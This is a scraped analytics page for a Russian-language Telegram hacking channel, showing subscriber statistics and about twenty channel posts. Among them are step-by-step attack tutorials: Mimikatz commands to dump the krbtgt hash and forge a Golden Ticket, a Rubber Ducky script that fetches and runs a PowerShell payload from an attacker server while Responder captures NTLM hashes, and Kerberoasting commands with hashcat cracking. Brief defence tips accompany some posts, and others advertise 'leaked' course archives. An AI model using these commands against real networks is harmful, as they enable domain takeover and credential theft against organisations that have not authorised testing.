¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
CyberGuard
Canal cerrado
Полезные инструменты, репозитории статьи и новости из мира ИБ и Хакинга Ссылка для друга: https://t.me/+ToMfaM5mK4w0NzBi По рекламе: @ReivuManager
Mostrar más4 680
Suscriptores
-124 horas
-157 días
+130 días
Carga de datos en curso...
Canales Similares
Nube de Etiquetas
Menciones Entrantes y Salientes
---
---
---
---
---
---
Atraer Suscriptores
junio '26
junio '26
+2
en 0 canales
mayo '26
+89
en 26 canales
Get PRO
abril '26
+276
en 40 canales
Get PRO
marzo '26
+222
en 84 canales
Get PRO
febrero '26
+22
en 6 canales
Get PRO
enero '26
+82
en 12 canales
Get PRO
diciembre '25
+97
en 44 canales
Get PRO
noviembre '25
+325
en 82 canales
Get PRO
octubre '25
+26
en 15 canales
Get PRO
septiembre '25
+19
en 0 canales
Get PRO
agosto '25
+1 481
en 60 canales
Get PRO
julio '25
+67
en 26 canales
Get PRO
junio '25
+148
en 21 canales
Get PRO
mayo '25
+9
en 1 canales
Get PRO
abril '25
+412
en 21 canales
Get PRO
marzo '25
+326
en 23 canales
Get PRO
febrero '25
+130
en 4 canales
Get PRO
enero '25
+125
en 2 canales
Get PRO
diciembre '24
+140
en 3 canales
Get PRO
noviembre '24
+340
en 4 canales
Get PRO
octubre '24
+244
en 5 canales
Get PRO
septiembre '24
+111
en 1 canales
Get PRO
agosto '24
+116
en 2 canales
Get PRO
julio '24
+222
en 8 canales
Get PRO
junio '24
+161
en 2 canales
Get PRO
mayo '24
+223
en 2 canales
Get PRO
abril '24
+203
en 1 canales
Get PRO
marzo '24
+210
en 3 canales
Get PRO
febrero '24
+256
en 2 canales
Get PRO
enero '24
+210
en 2 canales
Get PRO
diciembre '23
+162
en 2 canales
Get PRO
noviembre '23
+71
en 1 canales
Get PRO
octubre '23
+125
en 1 canales
Get PRO
septiembre '23
+90
en 0 canales
Get PRO
agosto '23
+53
en 0 canales
Get PRO
julio '23
+92
en 0 canales
Get PRO
junio '23
+107
en 0 canales
Get PRO
mayo '23
+76
en 0 canales
Get PRO
abril '23
+58
en 0 canales
Get PRO
marzo '23
+75
en 0 canales
Get PRO
febrero '23
+36
en 0 canales
Get PRO
enero '23
+249
en 0 canales
| Fecha | Crecimiento de Suscriptores | Menciones | Canales | |
| 04 junio | 0 | |||
| 03 junio | +1 | |||
| 02 junio | 0 | |||
| 01 junio | +1 |
Publicaciones del Canal
💻 АНТИВИРУСЫ И ТЕХНИКИ ОБХОДА: ПОЛНЫЙ ГАЙД ДЛЯ НОВИЧКА
📹 ПервоисточникCyberGuardе | Вакансии | Чат || #Видео
| 2 | Айтишник, который не умеет использовать командную строку bash – так себе специалист.
Если посетить несколько собеседований уровня от миддл, то можно убедиться, что вопросы про опыт работы в консоли появляются довольно часто.
Сходу научиться всем командам bash нереально – их очень много.
К счастью, появился канал BashMaster, в котором каждый день можно узнавать по одной небольшой связке команд и сразу же внедрять их в свою работу.
Подпишись, освоишь bash на изи 👍 | 219 |
| 3 |  🛡 Опасные баги, которые могли дать хакерам полный контроль
За последние дни в популярных библиотеках и системах нашли критические уязвимости. Админам и разработчикам — срочно к прочтению.
Что случилось:
🟢GStreamer 1.28.2 — три бага с переполнением буфера через обработку MKV, MOV/MP4 и H.266/VVC. Достаточно закинуть файл в ~/Downloads — автоматическая индексация GNOME запустит уязвимый код
🟢CUPS — две критические уязвимости дают выполнение кода от root через некорректно обработанные задания печати
🟢wolfSSL (CVE-2026-5194) — подрыв цифровых подписей ECDSA/DSA/Ed25519. OpenSSL (CVE-2026-31790) — буферы для RSA KEM
🟢OpenClaw 2026.3.11 — любой operator.admin мог стать админом командой /pair approve
🟢Nix (CVE-2026-39860) — перезапись любых файлов через символические ссылки в сборочном окружении
🟢Ядро Linux — баги в nfsd, io_uring, futex и ksmbd позволяют читать память ядра через NFS-запросы (некоторые живут с 2.6.0!)
Почему это важно:
Даже проверенные компоненты могут нести критические дыры. Одна библиотека может стоить вашей инфраструктуре очень дорого.
Вывод:
Обновляйте всё вовремя и следите за CVE. Это не паранойя — это работа.
CyberGuardе | Вакансии | Чат ||#Статья | 280 |
| 4 | 🔠 Слили 4 ТБ по IT, хакингу и разработке.
⚪️ Все лучшие инструкции, гайды, книги и инструменты — без воды.
🖥 Курсы & GitHub — 579GB
☁️ Хакинг & ИБ — 756GB
🤒 OSINT — 315GB
⌨️ Python — 955GB
🙃 Linux & Bash — 459GB
😦 Работа в IT — 278GB
🖥 Общий архив — 946GB
➡️ Присоединяйтесь и скачивайте.
Пост будет удален через 48 часов. | 292 |
| 5 |  💻 Awesome Bug Bounty Tools — Огромная подборка инструментов для охотников за ошибками
Awesome Bug Bounty Tools — это тщательно отобранный список (curated list) лучших программ, скриптов и ресурсов для проведения Bug Bounty и тестирования на проникновение.
— Репозиторий структурирован по категориям: разведка (Recon), поиск поддоменов, сканирование уязвимостей (XSS, SQLi, SSRF), мобильная безопасность, работа с облаками и автоматизация. Это один из самых полных справочников для ИБ-специалистов.
🐱 Ссылка на GitHub
CyberGuardе | Вакансии | Чат ||#Репозитории | 311 |
| 6 | 😒 Подборка каналов по информационной безопасности
Проверенные каналы по безопасности, которые реально помогают расти.
👍 ZeroDay — Уроки, эксплуатация уязвимостей с нуля
👍 Белый Хакер — Свежие новости из мира ИБ
😎 Бункер Хакера — Статьи, книги, шпаргалки и хакинг
👨💻 Серверная Админа — Настройка и уроки по компьютерным сетям
📂 Подписывайся | 308 |
| 7 |  CyberGuardе | Вакансии | Чат || | 341 |
| 8 | Изучаете кибербезопасность? Хотите стать топовым ИБ-специалистом с высокой ЗП?
Пока другие идут в летний отпуск, вы можете стремительно войти в сферу ИБ при помощи сборки "Безопасность в деле" которую мы составили.
Что внутри сборки:
– Каналы об Offensive Security: Поиск уязвимостей, пентест, и всё о защите от хакерства
– Digital Security каналы: защита данных, подсказки для ваших проектов и реальный опыт в отражении атак
– OSINT и анонимность: всё по теме поиска информации от А до Я, авторские лайфхаки и простые заметки с расследований
– Каналы про ИБ: опытные ИБ-специалисты делятся с вами знаниями и помогают в комментариях
Для каждого здесь что-то найдётся! Выберите интересные вам каналы и подпишитесь на сборку. Найдите то, что нужно именно вам для следующего шага в ИБ. | 352 |
| 9 | Evilginx3-Phishlets — Коллекция специализированных конфигурационных файлов (фишлетов) для фреймворка Evilginx3
Evilginx3 Phishlets — это библиотека YAML-конфигураций, предназначенных для работы с Evilginx3.
Эти инструменты используются специалистами по кибербезопасности (Red Teaming) для проведения атак типа Man-in-the-Middle (MITM) с целью тестирования устойчивости систем к фишингу.
🐱 Ссылка на GitHub
CyberGuardе | Вакансии | Чат |#Репозитории | 409 |
| 10 | Приветствую наших читателей! 👋
Сегодня разбираем Golden Ticket — атаку, которая даёт хакеру абсолютную власть над Active Directory. Украл один хеш — и ты бог домена. Подписываешь себе любые права, заходишь на любой сервер. Погнали! ⚡️
🔍 Что такое Golden Ticket?
В домене Windows есть специальная учётная запись — krbtgt. Она отвечает за подпись всех билетов Kerberos (TGT). Если хакер украл её NTLM-хеш, он может самостоятельно подписать билет для любого пользователя, включая администратора домена.
Этот фальшивый билет называется Golden Ticket. Он позволяет получить доступ к любым ресурсам домена, даже если хакер уже потерял доступ к контроллеру.
Что даёт Golden Ticket:
🔴 Доступ к любому серверу в домене.
🔴 Возможность создать себе учётную запись администратора.
🔴 Полный контроль над всей инфраструктурой.
🔴 Персистентность (закрепиться надолго).
⚙️ Как добыть хеш krbtgt?
Для создания Golden Ticket нужно:
1. Административный доступ к контроллеру домена (через эксплуатацию, Mimikatz, дамп LSASS).
2. Извлечь NTLM-хеш учётной записи krbtgt (или AES-ключи).
В Mimikatz:
lsadump::lsa /patch
Ищем в выводе строку с krbtgt и запоминаем хеш.
🛠 Создание Golden Ticket (Mimikatz)
kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:хеш_krbtgt /id:500 /ptt
- /user — имя пользователя, от которого подписываем билет.
- /domain — FQDN домена.
- /sid — SID домена (можно получить командой whoami /user на любой машине домена).
- /krbtgt — хеш учётки krbtgt.
- /id:500 — RID администратора домена.
- /ptt — внедрить билет в текущую сессию (Pass The Ticket).
После этого открывается доступ к \\controler.domain.local\C$ и другим ресурсам.
👺 Реальная фишка — персистентность даже после смены пароля
Если хакер создал Golden Ticket, а потом администратор сменил пароли всех пользователей и сервисов, хакер всё равно сохранит доступ. Пока не будет дважды сменён пароль krbtgt (и подождано время репликации), старые билеты остаются валидными.
Как выгнать хакера:
1. Сменить пароль krbtgt первый раз.
2. Подождать репликацию (часы).
3. Сменить пароль krbtgt второй раз.
4. Перезагрузить все системы.
🛡 Защита от Golden Ticket
🔴 Регулярно менять пароль krbtgt (каждые 6–12 месяцев) — дважды.
🔴 Ограничить доступ к контроллеру домена (админы должны работать с выделенных рабочих станций, а не с серверов).
🔴 Включить мониторинг аномалий Kerberos (необычные TGT, нестандартные сроки жизни билетов).
🔴 Использовать защищённые административные узлы (PAW).
🔴 Внедрить LAPS для уникальных локальных паролей на серверах.
Запомни: Golden Ticket — это элитная атака на Active Directory. Только лабораторное использование. Без разрешения — уголовка.
🧬 Итог
Golden Ticket — одна из самых опасных атак на Windows-домены. Украсть хеш krbtgt сложно, но если это случилось, хакер становится неуловимым. Администраторы, меняйте krbtgt дважды и мониторьте Kerberos.
🔥 Если тема зашла — газуй реакциями! 🔥
CyberGuardе | Вакансии | Чат || #Статья | 418 |
| 11 |  АНБОКСИНГ МИНИ-ПК ЗА 750$: ПОШАГОВАЯ УСТАНОВКА UBUNTU SERVER С ФЛЕШКИ ДЛЯ ИБ-ЛАБОРАТОРИИ
📹 Первоисточник
CyberGuardе | Вакансии | Чат || #Видео | 497 |
| 12 | Айтишники ловите сборник бесплатных курсов, полезных инструментов и книг
Проект «TERMINAL» стал крупнейшей библиотекой бесплатного образования. В одном канале собраны курсы, книги, полезные инструменты и практические тренажёры для всех разработчиков
🎓 Практические курсы и задания
🪽 Книги и статьи известных авторов
😮💨 Полезные инструменты и ресурсы
🌟 IT-новости и инсайды
Обучение по всем направлениям: SQL, Python, Frontend, PHP, C++, Golang, GIT, Linux, QA, Java, кибербезопасность и др.
Ценишь знания, подпишись: Terminal_tg | 337 |
| 13 | 🔥 Крадём NTLM-хеши через USB-флешку за 5 секунд
Хватит теории. Показываю, как обычная флешка роняет домен.
🎯 Атака: BadUSB + Responder
Берёшь USB Rubber Ducky (или любую флешку с Arduino). Записываешь скрипт:
DELAY 1000
GUI r
DELAY 200
STRING cmd /k powershell -c "Invoke-WebRequest -Uri http://ваш_сервер/evil.ps1 -OutFile $env:tmp\payload.ps1; powershell -exec bypass $env:tmp\payload.ps1"
ENTER
На своём сервере запускаешь:
responder -I eth0 -rdwv
Жертва втыкает флешку — за 5 секунд:
1. Скрипт дёргает ваш сервер.
2. Responder ловит NTLM-хеш учётки, под которой работает пользователь (часто админ).
3. Хеш брутишь через hashcat за пару минут.
4. Заходишь на любой сервер в домене под админом.
🗣 Реальный кейс:
На пентесте одной нефтяной компании мы оставили несколько таких флешек в вестибюле. Через час — полный захват домена. Сотрудники сами подключили "забытые" флешки.
➡️ Как защититься:
🔴 Отключить автозапуск USB через GPO.
🔴 Не втыкать найденные флешки.
🔴 Включить extended protection для NTLM.
CyberGuardе | Вакансии | Чат ||#Статья | 561 |
| 14 | 💻 Kerberoasting — охота на сервисные аккаунты, которая убивает Active Directory
Октябрь 2022 — август 2024. Атака Kerberoasting существует уже больше десяти лет, но до сих пор остаётся одной из самых недооценённых угроз для доменов Microsoft. Хакер с правами обычного пользователя запрашивает сервисные билеты (TGS) у KDC, вытаскивает из них хеш сервисной учётки, зашифрованный устаревшим протоколом RC4, и взламывает пароль офлайн, подбирая его на полной мощности своего GPU.
🎯 Что произошло:
1. Административная ошибка как норма — в Active Directory сервисные аккаунты (SQL, IIS, Exchange и др.) регистрируют специальные Service Principal Names (SPN). По правилам безопасности их пароли должны быть длиной 25+ символов и случайными. Но на практике их часто создают такие же, как у людей — короткие и осмысленные, а меняют раз в год, если вообще меняют.
2. Пентестерский «Сникерс» — любой аутентифицированный пользователь домена, даже без прав администратора, может выполнить запрос к контроллеру домена (KDC) за TGS-билетом для найденного SPN. «GetUserSPNs.py -request -dc-ip 10.10.10.26 TESTDOMAIN.local/testuser1:Testuser! > kerberoast.txt» — этой команды достаточно, чтобы забрать хеш к себе.
3. Офлайн-расстрел в хешкате — после получения хеша атакующий спокойно уходит со взломанной машины и запускает перебор уже на своём мощном оборудовании: «hashcat -m 13100 kerberoasting.txt rockyou2021.txt -r rules\InsidePro-HashManager.rule -O –force -w 3». Система безопасности эту часть атаки уже не увидит — в отличие от логов контроллера домена, где остаётся лишь событие ID 4769 (запрос билета), легко теряющееся в общем потоке.
4. Эскалация до Domain Admin — взломав пароль сервисного аккаунта, злоумышленники получают контроль над всей инфраструктурой (например, право на делегирование) и движутся дальше вглубь сети.
🔍 Почему это катастрофа:
🟢 Древность протокола RC4 — сервисные билеты до сих пор шифруются с помощью устаревшего алгоритма RC4, который делает возможным перебор пароля офлайн. Microsoft не спешит его отключать ради совместимости с древним софтом, и десятилетняя проблема остаётся открытой.
🟢 Широкие возможности даже у обычного пользователя — Kerberoasting не требует прав администратора. Запрос TGS для любого SPN в домене может выполнить любой аутентифицированный пользователь. Если злоумышленник уже внутри сети (после фишинга или через взломанную учётку), у него есть прямой путь к эскалации.
🟢 Атака вне поля зрения SOC — запрос сервисных билетов — штатная операция Kerberos, происходящая тысячами раз в день. Злоумышленнику достаточно сделать всего один корректный запрос, забрать TGS-REP, а тяжёлый перебор хеша проводить уже на своём компьютере, вдали от сетевых датчиков.
🟢 Сервисные аккаунты — идеальная цель — они часто имеют права локального администратора на серверах, а их пароли меняются редко. Взлом одной сервисной учётки может привести к компрометации десятков критически важных систем.
🗣 Реальный кейс:
В мае 2024 года некоммерческая больничная система Ascension Health подверглась массированной атаке с использованием вымогателя. Тихий сотрудник компании перешёл по вредоносной ссылке — стала цепная реакция взломов по всей сети. Позднее специалисты выяснили: хакеры добрались до серверов, применив атаку Kerberoasting. Уязвимость была названа Microsoft "low tech, high-impact": её эксплуатировали естественным поведением протокола и слабым паролем учётной записи сервера. Впоследствии их метод исследования повторил сенатор США Рон Уайден, обратившись в Федеральную комиссию по торговле с требованием разобраться в сложившейся ситуации. Одной слабой ссылки и одного устаревшего сервисного пароля хватило для паралича сетей крупной медицинской сети.
➡️ Полный разбор можно найти тут
CyberGuardе | Вакансии | Чат ||# #Статья | 539 |
| 15 | ⚠️ Внимание: Опубликована слитая недавно База из 1000+ топовых курсов и материалов для айтишников
Отсортировали их для вашего удобства и выложили в телеграм-каналы по категориям:
🤖 Нейросети – 855+ материалов
🖥 Python — 1558+ материалов
👩💻 Frontend — 1241+ материалов
👩💻 Backend — 1095+ материалов
⚙️ Программы — 978+ материалов
📚 Книги по IT — 779+ материалов
⌛️ Ссылки будут активны 48 часов, сохрани себе, чтобы не потерять! | 342 |
| 16 |  💻 SSLyze — быстрая и мощная библиотека для сканирования SSL/TLS на сервере
SSLyze — это библиотека на Python и инструмент командной строки, который может анализировать SSL настройку сервера подключаясь к нему. Он предназначен быть быстрым и всеобъемлющим и должен помочь организациям и тестерам выявить неправильные настройки влияющие на SSL/TLS серверов
🐱 Ссылка на GitHub
CyberGuardе | Вакансии | Чат ||#Репозитории | 541 |
| 17 | Совет на 2026 год – начните изучать ВАЙБ-КОДИНГ
Сейчас с нейронками можно самому создавать проекты любой сложности - от идеи до релиза.
➖Без опыта и образования в IT
➖Без команды программистов
Проще всего об этом рассказывает Кирилл, вайбкодер, который рубит 500к+ с собственных проектов.
По его гайдам не придется мучиться и тратить впустую часы, пытаясь научить ИИ работать, как надо.
Можешь начать с бесплатного урока, где он разобрал: что такое вайбкодинг, какие связки реально работают, как с нуля собрать проект и получить первых пользователей.
Забирай материал в закрепе: https://t.me/+2EYebVbH_iVjYjBi | 343 |
| 18 | 💻 С чего начать пентест: Roadmap для новичка
Ты решил стать пентестером? Поздравляю. Но сразу предупреждаю: никаких «взлом за 5 минут» не будет. Это долгий путь, который начинается не с Metasploit, а с головы. Вот база, без которой ты не сдвинешься.
🎯 5 шагов, чтобы перестать быть скрипткидди:
1. Выучи основы сетей — OSI, TCP/IP, DNS, HTTP/HTTPS. Без этого ты не поймешь, куда летят твои пакеты. Ресурсы: «Компьютерные сети» Таненбаума, курс от Cisco Networking Academy.
2. Освой Linux — желательно Kali или Parrot, но сначала просто Ubuntu. Научись работать в терминале, писать bash-скрипты, понимать права доступа, процессы, cron. Попробуй пройти Bandit на OverTheWire — это лучший тренажер.
3. Изучи язык программирования — Python обязателен (для скриптов, автоматизации, написания эксплойтов). JavaScript — для понимания веб-уязвимостей. Bash/PowerShell — для жизни в Windows и Linux.
4. Пойми, что такое ОС и AD — Windows, Linux, Active Directory. Научись работать с группами, политиками, правами. Это нужно для латерального перемещения.
5. Начни практиковаться — никакая теория не заменит реального опыта. Используй Hack The Box (начальные машины), TryHackMe, VulnHub, DVWA. Создай свою лабораторию в VirtualBox.
🔍 Чек-лист первичных инструментов (то, что ты должен уметь с закрытыми глазами):
✔️ Nmap — сканирование портов и сетей. Флаги: -sS, -sV, -O, -A, -p-.
✔️ Burp Suite — перехват и модификация HTTP-трафика. Научись настраивать прокси, использовать Repeater и Intruder.
✔️ Metasploit — фреймворк для эксплуатации уязвимостей. Понимать, что такое payload, exploit, listener.
✔️ Wireshark — анализ трафика. Фильтры: http, dns, tcp.port==80, ip.addr==x.x.x.x.
✔️ John the Ripper / Hashcat — взлом хешей. Уметь конвертировать хеши и подбирать словарём.
CyberGuardе | Вакансии | Чат || #Статья | 672 |
| 19 |  Взлом игр от "А" до "Я"
📹 Весь плейлист
CyberGuardе | Вакансии | Чат || #Видео | 714 |
| 20 |  Безопасность в сети Интернет
Мы полагаемся на интернет–сервисы, когда речь идёт о наших доходах, вложениях, документах, личных историях и тайнах. Однако там, где есть деньги и ценные сведения, всегда найдутся злоумышленники, желающие их присвоить.
В этом курсе мы поделимся с Вами информацией о том, как настроить свои личные устройства таким образом, чтобы они были надёжно защищены от взлома. Мы также расскажем, как распознавать мошеннические сайты и безопасно совершать онлайн–платежи.
➡️ Пройти курс
CyberGuardе | Вакансии | Чат || #Курсы | 932 |
